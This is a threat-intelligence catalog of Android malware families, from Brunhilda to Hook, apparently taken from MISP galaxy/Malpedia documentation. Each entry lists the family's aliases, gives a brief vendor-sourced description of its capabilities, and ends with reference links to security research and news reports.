Brunhilda

PRODAFT describes Brunhilda as a "Dropper as a Service" for Google Play, delivering e.g. Alien.

The tag is: misp-galaxy:malpedia="Brunhilda"

Brunhilda is also known as:

Table 2065. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.brunhilda

https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud

https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf

https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html

BusyGasper

The tag is: misp-galaxy:malpedia="BusyGasper"

BusyGasper is also known as:

Table 2066. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper

https://securelist.com/busygasper-the-unfriendly-spy/87627/

CapraRAT

According to PCrisk, CapraRAT is the name of an Android remote access trojan (RAT), possibly a modified version of another (open-source) RAT called AndroRAT. It is known that CapraRAT is used by an advanced persistent threat group (ATP) called APT36 (also known as Earth Karkaddan). CapraRAT allows attackers to perform certain actions on the infected Android device.

The tag is: misp-galaxy:malpedia="CapraRAT"

CapraRAT is also known as:

Table 2067. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.capra_rat

https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/

https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/

https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

CarbonSteal

The tag is: misp-galaxy:malpedia="CarbonSteal"

CarbonSteal is also known as:

Table 2068. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.carbonsteal

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

Catelites

Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim. The distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered. Currently the malware has overlays for over 2,200 apps of banks and financial institutions.

The tag is: misp-galaxy:malpedia="Catelites"

Catelites is also known as:

Table 2069. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites

https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang

https://www.youtube.com/watch?v=1LOy0ZyjEOk

Cerberus

According to PCrisk, Cerberus is an Android banking Trojan which can be rented on hacker forums. It was been created in 2019 and is used to steal sensitive, confidential information. Cerberus can also be used to send commands to users' devices and perform dangerous actions.

The tag is: misp-galaxy:malpedia="Cerberus"

Cerberus is also known as:

Table 2070. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus

https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/

https://twitter.com/AndroidCerberus

https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html

https://community.riskiq.com/article/85b3db8c

https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html

https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/

https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf

https://securelist.com/the-state-of-stalkerware-in-2021/106193/

https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus

https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf

https://nur.pub/cerberus-analysis

https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/

https://github.com/ics-iot-bootcamp/cerberus_research

https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/

https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

Chameleon

The malware chamaleon is an Android trojan that pretends to be legitimate entities to steal data from users in Australia and Poland. It exploits the Accessibility Service to monitor and modify the device screen.

The tag is: misp-galaxy:malpedia="Chameleon"

Chameleon is also known as:

Table 2071. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.chameleon

https://www.threatfabric.com/blogs/android-banking-trojan-chameleon-is-back-in-action

https://blog.cyble.com/2023/04/13/chameleon-a-new-android-malware-spotted-in-the-wild/

Chrysaor

The tag is: misp-galaxy:malpedia="Chrysaor"

Chrysaor is also known as:

  • JigglyPuff

  • Pegasus

Table 2075. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1

https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages

https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto

https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/

https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/

https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/

https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/

https://twitter.com/alexanderjaeger/status/1417447732030189569

https://nex.sx/blog/2021/08/03/the-pegasus-project.html

https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/

https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/

https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests

https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus

https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso

https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/

https://therecord.media/mexican-army-spyware

https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/

https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html

https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/

https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/

https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/

https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/

https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying

https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/

https://media.ccc.de/v/33c3-7901-pegasus_internals

https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure

https://citizenlab.ca/2021/07/amnesty-peer-review/

https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf

https://zetter.substack.com/p/pegasus-spyware-how-it-works-and

https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5

https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/

https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/

https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html

https://irpimedia.irpi.eu/sorveglianze-cy4gate/

https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/

https://thewire.in/tag/pegasus-project

https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html

https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/

https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/

https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/

https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/

https://objective-see.com/blog/blog_0x67.html

https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/

https://forbiddenstories.org/about-the-pegasus-project/

https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/

https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/

https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html

https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/

https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/

https://www.theguardian.com/news/series/pegasus-project

https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat

https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/

https://twitter.com/billmarczak/status/1416801439402262529

https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/

https://twitter.com/HackSysTeam/status/1418223814387765258?s=20

https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/

https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/

https://thewire.in/media/pegasus-project-spyware-indian-journalists

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/

https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/

Clientor

The tag is: misp-galaxy:malpedia="Clientor"

Clientor is also known as:

Table 2076. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor

https://twitter.com/LukasStefanko/status/1042297855602503681

CometBot

The tag is: misp-galaxy:malpedia="CometBot"

CometBot is also known as:

Table 2079. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot

https://twitter.com/LukasStefanko/status/1102937833071935491

Connic

The tag is: misp-galaxy:malpedia="Connic"

Connic is also known as:

  • SpyBanker

Table 2080. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic

https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/

Coronavirus Android Worm

Poses as an app that can offer a "corona safety mask" but phone’s address book and sends sms to contacts, spreading its own download link.

The tag is: misp-galaxy:malpedia="Coronavirus Android Worm"

Coronavirus Android Worm is also known as:

Table 2082. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm

https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan

https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html

Cpuminer (Android)

The tag is: misp-galaxy:malpedia="Cpuminer (Android)"

Cpuminer (Android) is also known as:

Table 2083. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer

https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/

CryCryptor

According to NHS Digital, CryCryptor is distributed via websites that spoof health organisations. At the time of publication these websites have affected the Canadian health service. CryCryptor cannot be obtained from the Google Play store, so devices restricted to only running apps from the store are not affected.

When CryCryptor is run it encrypts common file types and saves a ransom note to every directory where files have been encrypted. Encrypted files have the extension '.enc' appended to the filenames. Additional files are saved containing the salt values used in each encryption and an initialisation vector. These files have the extensions '.enc.salt' and '.enc.iv' respectively.

When files have been encrypted, a notification is displayed directing users to open the ransom note.

The tag is: misp-galaxy:malpedia="CryCryptor"

CryCryptor is also known as:

  • CryCrypter

  • CryDroid

Table 2084. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor

https://www.welivesecurity.com/2020/06/24/new-ransomware-uses-covid19-tracing-guise-target-canada-eset-decryptor/

DAAM

According to PCrisk, DAAM is an Android malware utilized to gain unauthorized access to targeted devices since 2021. With the DAAM Android botnet, threat actors can bind harmful code with a genuine application using its APK binding service.

Lookout refers to this malware as BouldSpy and assesses with medium confidence that this Android surveillance tool is used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA).

The tag is: misp-galaxy:malpedia="DAAM"

DAAM is also known as:

  • BouldSpy

Table 2086. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.daam

https://www.lookout.com/blog/iranian-spyware-bouldspy

https://blog.cyble.com/2023/04/20/daam-android-botnet-being-distributed-through-trojanized-applications/

Dark Shades

The tag is: misp-galaxy:malpedia="Dark Shades"

Dark Shades is also known as:

  • Rogue

Table 2087. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.darkshades

https://twitter.com/LukasStefanko/status/1252163657036976129

DoubleAgent

The tag is: misp-galaxy:malpedia="DoubleAgent"

DoubleAgent is also known as:

Table 2092. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.doubleagent

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

DoubleLocker

The tag is: misp-galaxy:malpedia="DoubleLocker"

DoubleLocker is also known as:

Table 2093. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker

https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/

Dracarys

Android malware that impersonates genuine applications such as Signal, Telegram, WhatsApp, YouTube, and other chat applications and distributes through phishing sites.

The tag is: misp-galaxy:malpedia="Dracarys"

Dracarys is also known as:

Table 2094. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.dracarys

https://blog.cyble.com/2022/08/09/bitter-apt-group-using-dracarys-android-spyware/

DroidJack

The tag is: misp-galaxy:malpedia="DroidJack"

DroidJack is also known as:

Table 2096. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidjack

https://www.stratosphereips.org/blog/2021/1/22/analysis-of-droidjack-v44-rat-network-traffic

Eventbot

According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.

The tag is: misp-galaxy:malpedia="Eventbot"

Eventbot is also known as:

Table 2102. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot

https://www.youtube.com/watch?v=qqwOrLR2rgU

https://twitter.com/ThreatFabric/status/1240664876558823424

https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born

FakeAdBlocker

The tag is: misp-galaxy:malpedia="FakeAdBlocker"

FakeAdBlocker is also known as:

Table 2106. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakeadblocker

https://www.welivesecurity.com/2021/07/20/url-shortener-services-android-malware-banking-sms-trojans/

Fakecalls

According to Kaspersky, Fakecalls is a Trojan that masquerades as a banking app and imitates phone conversations with bank employees.

The tag is: misp-galaxy:malpedia="Fakecalls"

Fakecalls is also known as:

Table 2107. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakecalls

https://www.kaspersky.com.au/blog/fakecalls-banking-trojan/30379/

https://research.checkpoint.com/2023/south-korean-android-banking-menace-fakecalls/

FakeGram

The tag is: misp-galaxy:malpedia="FakeGram"

FakeGram is also known as:

  • FakeTGram

Table 2109. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram

https://blog.talosintelligence.com/2018/11/persian-stalker.html

FileCoder

According to heimdal, A new strain of ransomware emerged on Android mobile devices. It targets those who are running the operating system Android 5.1 and higher. This Android ransomware strain has been dubbed by security researchers FileCoder (Android/Filecoder.c) and it spreads via text messages containing a malicious link.

The tag is: misp-galaxy:malpedia="FileCoder"

FileCoder is also known as:

Table 2112. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder

https://www.welivesecurity.com/2019/07/29/android-ransomware-back/

FlexiSpy (Android)

The tag is: misp-galaxy:malpedia="FlexiSpy (Android)"

FlexiSpy (Android) is also known as:

Table 2114. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy

https://mobisec.reyammer.io/slides

https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/

FluBot

PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for it’s C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.

The tag is: misp-galaxy:malpedia="FluBot"

FluBot is also known as:

  • Cabassous

  • FakeChat

Table 2116. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot

https://www.ncsc.admin.ch/22w12-de

https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html

https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/

https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/

https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users

https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon

https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html

https://twitter.com/albertosegura/status/1402615237296148483

https://mobile.twitter.com/albertosegura/status/1400396365759500289

https://twitter.com/albertosegura/status/1404098461440659459

https://twitter.com/albertosegura/status/1395675479194095618

https://therecord.media/flubot-malware-gang-arrested-in-barcelona/

https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/

https://twitter.com/albertosegura/status/1399249798063087621?s=20

https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered

https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf

https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.infinitumit.com.tr/flubot-zararlisi/

https://securityintelligence.com/posts/story-of-fakechat-malware/

https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06

https://twitter.com/albertosegura/status/1384840011892285440

https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/

https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9

https://twitter.com/malwrhunterteam/status/1359939300238983172

https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html

https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/

https://hispasec.com/resources/FedexBanker.pdf

https://www.prodaft.com/m/reports/FluBot_4.pdf

https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain

https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368

https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027

https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/

https://blog.zimperium.com/flubot-vs-zimperium/

https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/

https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones

FluHorse

According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.

The tag is: misp-galaxy:malpedia="FluHorse"

FluHorse is also known as:

Table 2117. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse

https://www.fortinet.com/blog/threat-research/fortinet-reverses-flutter-based-android-malware-fluhorse

https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/

https://cryptax.medium.com/inside-kangapack-the-kangaroo-packer-with-native-decryption-3e7e054679c4

FlyTrap

Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading.

The tag is: misp-galaxy:malpedia="FlyTrap"

FlyTrap is also known as:

Table 2118. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.flytrap

https://blog.zimperium.com/flytrap-android-malware-compromises-thousands-of-facebook-accounts/

FurBall

According to Check Point, they uncovered an operation dubbed "Domestic Kitten", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.

The tag is: misp-galaxy:malpedia="FurBall"

FurBall is also known as:

Table 2120. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball

https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/

https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program

https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html

https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/

https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/

https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/

https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf

Ghimob

The tag is: misp-galaxy:malpedia="Ghimob"

Ghimob is also known as:

Table 2122. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghimob

https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/

Gigabud

Gigabud is the name of an Android Remote Access Trojan (RAT) Android that can record the victim’s screen and steal banking credentials by abusing the Accessibility Service. Gigabud masquerades as banking, shopping, and other applications. Threat actors have been observed using deceptive websites to distribute Gigabud RAT.

The tag is: misp-galaxy:malpedia="Gigabud"

Gigabud is also known as:

Table 2124. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.gigabud

https://www.group-ib.com/blog/gigabud-banking-malware/

https://blog.cyble.com/2023/01/19/gigabud-rat-new-android-rat-masquerading-as-government-agencies/

Ginp

Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:

Overlaying: Dynamic (local overlays obtained from the C2) SMS harvesting: SMS listing SMS harvesting: SMS forwarding Contact list collection Application listing Overlaying: Targets list update SMS: Sending Calls: Call forwarding C2 Resilience: Auxiliary C2 list Self-protection: Hiding the App icon Self-protection: Preventing removal Self-protection: Emulation-detection.

The tag is: misp-galaxy:malpedia="Ginp"

Ginp is also known as:

Table 2125. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp

https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html

https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/

https://twitter.com/ESETresearch/status/1269945115738542080

https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/

https://www.youtube.com/watch?v=WeL_xSryj8E

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

https://muha2xmad.github.io/malware-analysis/ginp/

GoatRAT

The tag is: misp-galaxy:malpedia="GoatRAT"

GoatRAT is also known as:

Table 2128. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.goat_rat

https://labs.k7computing.com/index.php/goatrat-attacks-automated-payment-systems/

Godfather

According to PCrisk, Godfather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use Godfather to steal account credentials. Additionally, Godfather can steal SMSs, device information, and other data.

The tag is: misp-galaxy:malpedia="Godfather"

Godfather is also known as:

Table 2129. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.godfather

https://brandefense.io/blog/godfather-android-banking-trojan/

https://github.com/LaurieWired/StrangeLoop

https://blog.group-ib.com/godfather-trojan

https://muha2xmad.github.io/malware-analysis/godfather/

GoldenEagle

The tag is: misp-galaxy:malpedia="GoldenEagle"

GoldenEagle is also known as:

Table 2130. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldeneagle

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

GoldDigger

The tag is: misp-galaxy:malpedia="GoldDigger"

GoldDigger is also known as:

Table 2132. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.gold_digger

https://www.group-ib.com/blog/golddigger-fraud-matrix/

GPlayed

Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed.

The tag is: misp-galaxy:malpedia="GPlayed"

GPlayed is also known as:

Table 2134. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed

https://blog.talosintelligence.com/2018/10/gplayedtrojan.html

https://blog.talosintelligence.com/2018/10/gplayerbanker.html

Gustuff

Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities. The analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.

The tag is: misp-galaxy:malpedia="Gustuff"

Gustuff is also known as:

Table 2137. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff

https://www.group-ib.com/media/gustuff/

https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html

https://blog.talosintelligence.com/2019/10/gustuffv2.html

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

Hermit

Lookout states that Hermit is an advanced spyware designed to target iOS and Android mobile devices. It is designed to collect extensive amounts of sensitive data on its victims such as their location, contacts, private messages, photos, call logs, phone conversations, ambient audio recordings, and more.

The tag is: misp-galaxy:malpedia="Hermit"

Hermit is also known as:

Table 2141. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hermit

https://www.lighthousereports.nl/investigation/revealing-europes-nso

https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/

https://de.lookout.com/blog/hermit-spyware-discovery

HeroRAT

The tag is: misp-galaxy:malpedia="HeroRAT"

HeroRAT is also known as:

Table 2142. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat

https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/

HilalRAT

RAT, which can be used to extract sensitive information, e.g. contact lists, txt messages, location information.

The tag is: misp-galaxy:malpedia="HilalRAT"

HilalRAT is also known as:

Table 2144. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hilalrat

https://thehackernews.com/2022/04/microsoft-obtains-court-order-to-take.html

Hook

According to ThreatFabric, this is a malware family based on apk.ermac. The name hook is the self-advertised named by its vendor DukeEugene. It provides WebSocket communication and has RAT capabilities.

The tag is: misp-galaxy:malpedia="Hook"

Hook is also known as:

Table 2145. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hook

https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html

https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware

https://research.nccgroup.com/2023/09/11/from-ermac-to-hook-investigating-the-technical-differences-between-two-android-malware-variants/

https://github.com/0xperator/hookbot_source

